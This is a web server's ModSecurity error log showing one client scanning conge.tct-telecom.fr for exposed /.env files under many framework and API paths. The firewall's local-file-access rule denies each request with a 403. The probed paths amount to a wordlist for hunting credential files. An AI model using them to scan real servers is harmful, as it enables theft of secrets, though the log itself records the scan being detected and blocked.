[Mon May 11 16:41:42.906106 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /zend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/zend/.env"] [unique_id "agHqpkWKUxpmnkK7zHyCYQAAAQo"]
[Mon May 11 16:41:42.906614 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/zend/.env"] [unique_id "agHqpkWKUxpmnkK7zHyCYQAAAQo"]
[Mon May 11 16:41:42.906859 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/zend/.env"] [unique_id "agHqpkWKUxpmnkK7zHyCYQAAAQo"]
[Mon May 11 16:41:43.236673 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /yii/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/yii/.env"] [unique_id "agHqp0WKUxpmnkK7zHyCYgAAAQo"]
[Mon May 11 16:41:43.237147 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/yii/.env"] [unique_id "agHqp0WKUxpmnkK7zHyCYgAAAQo"]
[Mon May 11 16:41:43.237419 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/yii/.env"] [unique_id "agHqp0WKUxpmnkK7zHyCYgAAAQo"]
[Mon May 11 16:41:43.403698 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel5/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/laravel5/.env"] [unique_id "agHqp0WKUxpmnkK7zHyCYwAAAQo"]
[Mon May 11 16:41:43.404204 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/laravel5/.env"] [unique_id "agHqp0WKUxpmnkK7zHyCYwAAAQo"]
[Mon May 11 16:41:43.404434 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/laravel5/.env"] [unique_id "agHqp0WKUxpmnkK7zHyCYwAAAQo"]
[Mon May 11 16:41:43.646721 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/v1/.env"] [unique_id "agHqp0WKUxpmnkK7zHyCZQAAAQo"]
[Mon May 11 16:41:43.647232 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/v1/.env"] [unique_id "agHqp0WKUxpmnkK7zHyCZQAAAQo"]
[Mon May 11 16:41:43.648722 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/v1/.env"] [unique_id "agHqp0WKUxpmnkK7zHyCZQAAAQo"]
[Mon May 11 16:41:43.861433 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/v2/.env"] [unique_id "agHqp0WKUxpmnkK7zHyCZgAAAQo"]
[Mon May 11 16:41:43.861991 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/v2/.env"] [unique_id "agHqp0WKUxpmnkK7zHyCZgAAAQo"]
[Mon May 11 16:41:43.862239 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/v2/.env"] [unique_id "agHqp0WKUxpmnkK7zHyCZgAAAQo"]
[Mon May 11 16:41:44.163461 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/v3/.env"] [unique_id "agHqqEWKUxpmnkK7zHyCZwAAAQo"]
[Mon May 11 16:41:44.163961 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/v3/.env"] [unique_id "agHqqEWKUxpmnkK7zHyCZwAAAQo"]
[Mon May 11 16:41:44.166669 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/v3/.env"] [unique_id "agHqqEWKUxpmnkK7zHyCZwAAAQo"]
[Mon May 11 16:41:44.332273 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api/v1/.env"] [unique_id "agHqqEWKUxpmnkK7zHyCaQAAAQo"]
[Mon May 11 16:41:44.332759 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api/v1/.env"] [unique_id "agHqqEWKUxpmnkK7zHyCaQAAAQo"]
[Mon May 11 16:41:44.333026 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api/v1/.env"] [unique_id "agHqqEWKUxpmnkK7zHyCaQAAAQo"]
[Mon May 11 16:41:44.509623 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api/v2/.env"] [unique_id "agHqqEWKUxpmnkK7zHyCagAAAQo"]
[Mon May 11 16:41:44.510103 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api/v2/.env"] [unique_id "agHqqEWKUxpmnkK7zHyCagAAAQo"]
[Mon May 11 16:41:44.510328 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api/v2/.env"] [unique_id "agHqqEWKUxpmnkK7zHyCagAAAQo"]
[Mon May 11 16:41:44.677631 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/rest/.env"] [unique_id "agHqqEWKUxpmnkK7zHyCawAAAQo"]
[Mon May 11 16:41:44.678132 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/rest/.env"] [unique_id "agHqqEWKUxpmnkK7zHyCawAAAQo"]
[Mon May 11 16:41:44.678401 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/rest/.env"] [unique_id "agHqqEWKUxpmnkK7zHyCawAAAQo"]
[Mon May 11 16:41:45.026548 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /graphql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/graphql/.env"] [unique_id "agHqqUWKUxpmnkK7zHyCbAAAAQo"]
[Mon May 11 16:41:45.027014 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/graphql/.env"] [unique_id "agHqqUWKUxpmnkK7zHyCbAAAAQo"]
[Mon May 11 16:41:45.027249 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/graphql/.env"] [unique_id "agHqqUWKUxpmnkK7zHyCbAAAAQo"]
[Mon May 11 16:41:45.190228 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gateway/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/gateway/.env"] [unique_id "agHqqUWKUxpmnkK7zHyCbQAAAQo"]
[Mon May 11 16:41:45.190642 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/gateway/.env"] [unique_id "agHqqUWKUxpmnkK7zHyCbQAAAQo"]
[Mon May 11 16:41:45.190870 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/gateway/.env"] [unique_id "agHqqUWKUxpmnkK7zHyCbQAAAQo"]
[Mon May 11 16:41:45.356144 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservice/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/microservice/.env"] [unique_id "agHqqUWKUxpmnkK7zHyCbwAAAQo"]
[Mon May 11 16:41:45.356650 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/microservice/.env"] [unique_id "agHqqUWKUxpmnkK7zHyCbwAAAQo"]
[Mon May 11 16:41:45.356870 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/microservice/.env"] [unique_id "agHqqUWKUxpmnkK7zHyCbwAAAQo"]
[Mon May 11 16:41:45.530142 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/service/.env"] [unique_id "agHqqUWKUxpmnkK7zHyCcAAAAQo"]
[Mon May 11 16:41:45.530646 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/service/.env"] [unique_id "agHqqUWKUxpmnkK7zHyCcAAAAQo"]
[Mon May 11 16:41:45.530897 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/service/.env"] [unique_id "agHqqUWKUxpmnkK7zHyCcAAAAQo"]
